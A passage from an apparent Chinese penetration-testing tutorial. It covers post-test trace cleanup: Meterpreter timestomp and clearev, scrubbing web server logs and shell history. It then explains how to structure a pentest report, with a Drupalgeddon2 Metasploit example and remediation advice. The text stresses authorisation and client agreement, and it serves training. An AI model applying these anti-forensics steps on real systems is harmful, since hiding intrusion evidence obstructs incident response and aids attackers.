渗透测试后的日志与痕迹清理在授权的渗透测试中清理痕迹通常不是必须步骤有时甚至被要求保留攻击证据。但在某些演练场景下为了模拟高级持续性威胁APT的隐蔽性或者出于对靶机环境的保护需要进行基本的清理。在Meterpreter中可以使用timestomp命令修改文件的时间戳将其恢复为与其他系统文件相似的时间。对于Windows系统需要关注以下日志但请注意直接删除日志文件行为本身会留下更明显的安全日志记录安全日志 记录登录/注销、特权使用等。可通过clearev命令尝试清除Meterpreter会话相关的安全日志、应用程序日志和系统日志但这并非总是100%有效。Web日志 如果通过Web漏洞进入需清理目标Web服务器如Apache的access.logerror.log中的攻击请求记录。命令行历史 在Linux中清理.bash_history在Windows中可以通过meterpreter的shell进入后使用命令doskey /reinstall来清除当前会话的命令记录治标不治本。更高级的清理涉及直接操作日志文件或通过注入进程内存来清除单条日志记录这需要更深入的系统知识。务必注意在非授权环境中清理痕迹是违法行为的重要证据。在授权测试中是否清理、清理到何种程度必须事先与客户明确约定。7.2 从利用到报告思维转换一次完整的渗透测试漏洞利用只是中间环节。真正的价值产出是渗透测试报告。报告需要将技术语言转化为业务语言和管理语言。一份专业的报告至少应包含执行摘要 用非技术语言向管理层概述测试范围、发现的主要风险、整体安全状况评级以及最紧迫的建议。测试范围与方法 明确测试的IP、域名、系统类型和所用的主要方法黑盒/白盒/灰盒。详细发现 这是报告的核心。每个漏洞应作为一个独立条目包含漏洞标题 简明扼要如“Drupal Core 远程代码执行漏洞CVE-2018-7600”。风险等级 通常分为高危、中危、低危、信息级需结合CVSS评分和业务影响综合评定。受影响资产 具体的URL或IP地址。漏洞描述 用通俗语言说明漏洞是什么。漏洞验证步骤 提供详细的、可复现的操作步骤和截图。这就是我们使用Metasploit和手工测试的过程记录。例如“使用Metasploit的exploit/unix/webapp/drupal_drupalgeddon2模块设置RHOST为目标URL成功获取了www-data用户的Meterpreter会话。”漏洞原理 简要的技术原理分析帮助开发人员理解根源。修复建议 具体、可操作的修复方案。例如“立即将Drupal核心升级至7.58及以上版本。”、“对用户输入的所有参数进行严格的过滤和转义。”参考链接 CVE编号、官方补丁链接、相关技术文章。附录 可以放置一些工具输出截图、流量包片段等辅助材料。从炫技的“拿下权限”到严谨的“输出报告”是渗透测试人员从技术专家向安全顾问转型的关键一步。报告的质量直接决定了测试的价值也是衡量你专业水平的重要标尺。养成在测试过程中随时截图、记录命令和结果的习惯会为后续的报告撰写节省大量时间。
)
